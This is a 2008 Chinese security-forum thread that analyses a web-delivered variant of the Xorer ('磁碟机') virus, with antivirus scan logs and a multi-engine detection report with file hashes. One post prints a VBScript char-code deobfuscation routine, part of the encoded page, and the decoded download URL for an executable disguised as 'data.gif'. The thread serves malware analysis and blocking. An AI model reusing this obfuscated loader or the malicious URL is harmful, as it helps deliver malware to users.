磁碟机变种

显示全部楼层 · 发表于 2008-3-9 00:21:23

建议屏蔽掉http://js.k0102.com
http://js.k0102.com/01.asp--〉
http://js.k0102.com/a11.htm--〉

[frame]\"a1111.htm\"
[frame]\"a2111.htm\"
[frame]\"a4111.htm\"
[frame]\"a5111.htm\"
[frame]\"a6111.htm\"
[frame]\"a7111.htm\"
[frame]\"a8111.htm\"
[frame]\"a9111.htm\"
[frame]\"a10111.htm\"
[frame]\"jsr222.htm\"

看了a1111.htm，replace的功能还是有用的

function rechange(k)
s=Split(k,"#")
t=""
For i = 0 To UBound(s)
a=Chr(eval(s(i)))
t=t&a
Next
rechange=t
End Function
t="60#104#116#109#108#62#13#10#60#104#101#97#100#62#13#10#60#116#105#116#108#101#62#32#60#47#116#105#116#108#101#62#13#10#13#10#60#47#104#101#97#100#62#13#10#60#98#111#100#121#62#13#10#13#10#60#115#99#114#105#112#116#32#108#97#110#103#117#97#103#101#61#34#118#98#115#99#114#105#112#116#34#62#111#110#32#101#114#114#111#114#32#114#101#115#117#109#101#32#110#101#120#116#13#10#109#49#61#34#111#98#106#101#99#116#34#13#10#109#50#61#34#99#108#97#115#115#105#100#34#13#10#109#51#61#34#99#108#115#105#100#58#66#68#57#54#34#43#77#105#99#114#111#115#111#102#116#43#34#67#53..............

解得

MircoLong = "ht"+"tp"+"://"+"j"+"s.k"+"01"+"02.co"+"m/da"+"ta.g"+"if"

hp://js.k0102.com/data.gif，gif实为exe

显示全部楼层 · 发表于 2008-3-9 00:22:16

norman pass

显示全部楼层 · 发表于 2008-3-9 00:22:48

C:\Documents and Settings\Don johnson\桌面\data.rar » RAR » data.gif - probably a variant of Win32/Xorer virus

显示全部楼层 · 发表于 2008-3-9 00:28:00

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\data.rar'
C:\Documents and Settings\Administrator\桌面\data.rar
  [0] Archive type: RAR
  --> data.gif
   [DETECTION] Is the Trojan horse TR/Drop.Xorer.C
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2008-3-9 00:28:36

VirSCAN.org Scanned Report :
Scanned time : 2008/03/09 00:24:27 (CST)
Scanner results: 22%的杀软(8/36)报告发现病毒
File Name    : data.gif
File Size    : 93696 byte
File Type    : MS-DOS executable (EXE), OS/2 or MS Windows
MD5          : 88b67ec541b5979c19ad484f8edea1bb
SHA1          : 60825c1a2a5df70029b1ca54f17af3058396854e
Online report  : http://virscan.org/report/2710e6bc0c41eca6b83b60dd541880fb.html

Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.0.0.126    2008.03.07       2008-03-07  4.69 -
安博士V3    2008.03.08.00 2008.03.08       2008-03-08  1.65 -
AntiVir       7.6.0.73       7.0.3.5          2008-03-07  10.10  TR/Drop.Xorer.C
Arcavir       1.0.4          200803071708    2008-03-07  12.00  -
AVAST       1.0.8          080307-0       2008-03-07  14.08  -
AVG          7.5.51.442    269.21.7/1319    2008-03-08  6.20 Worm/AutoRun.AR
BitDefender 7.60825.986180  7.16171          2008-03-08  9.59 -
CA (VET)    9.0.0.143    31.3.5597       2008-03-08  7.85 -
ClamAV       0.92          6173             2008-03-08  0.11 -
Comodo       2.11          2.0.0.457       2008-03-07  1.85 -
CP Secure    1.1.0.715    2008.03.04       2008-03-04  7.33 -
Dr.WEB       4.44.0.9170    2008.03.08       2008-03-08  9.70 Win32.HLLP.Rox.origin
ewido       4.0.0.2       2008.03.08       2008-03-08  2.48 -
F-PROT       4.4.1.52       20080307       2008-03-07  4.32 -
F-SECURE    5.51.6100    2008.03.08.01    2008-03-08  6.06 -
飞塔          2.81-3.11    8.824          2008-03-08  4.76 Suspicious
ViRobot       20080307       2008.03.07       2008-03-07  0.99 -
IKARUS       T3.1.01.20    2008.03.03.70398  2008-03-03  3.39 Trojan-Dropper.Xorer.C
江民杀毒    10.00.650    2008.03.07       2008-03-07  1.64 -
卡巴斯基    5.5.10       2008.03.08       2008-03-08  10.84  -
金山毒霸    2007.6.20.249 2008.3.8       2008-03-08  0.81 Worm.VcingT.ca.93696
迈克菲       5.2.00       5243             2008-03-03  3.57 -
Microsoft    1.3301       2008.03.08       2008-03-08  7.01 Virus:Win32/Xorer.F
MKS_VIR       2.01          2008.03.08       2008-03-08  3.56 -
NORMAN       5.91.10       5.90             2008-03-07  5.91 -
熊猫卫士    9.04.03.0001 2008.03.07       2008-03-07  2.72 -
趋势          8.500-1001    5.146.27       2008-03-08  0.09 -
Prevx       V2             20080308       2008-03-08  3.71 -
QuickHeal    9.00          2008.03.08       2008-03-08  2.62 -
瑞星          20.0          20.34.52.00    2008-03-08  2.32 -
SOPHOS       2.71.3       4.27             2008-03-04  5.53 -
赛门铁克    1.3.0.24       20080307.003    2008-03-07  0.21 -
nProtect    2008-03-08.00 1196668          2008-03-08  4.88 -
The Hacker    6.2.9          v00237          2008-03-07  1.01 -
VBA32       3.12.6.2       20080307.2305    2008-03-07  1.20 -
VirusBuster 4.3.19:9       9.121.29/11.0    2008-03-03  1.79 Win32.Xorer.Gen

显示全部楼层 · 发表于 2008-3-9 00:29:05

上报卡巴

显示全部楼层 · 发表于 2008-3-9 00:30:09

virusbuster针对xorer出了一个generic。。。。。。但是奇怪的是金山的命名Worm.VcingT。。。。。。怎么感觉有点viking的意思

显示全部楼层 · 发表于 2008-3-9 00:31:07

dw的origin也是generic
反正kav,rav这种就喜欢慢慢受罪

[ 本帖最后由 promised 于 2008-3-9 00:32 编辑 ]

显示全部楼层 · 发表于 2008-3-9 00:32:02

应该是做了免杀吧
它就那几个动作

显示全部楼层 · 发表于 2008-3-9 00:34:13

怎样得到http://js.k0102.com网页代码

[病毒样本] 磁碟机变种

本帖子中包含更多资源

回复 7楼 EQ2 的帖子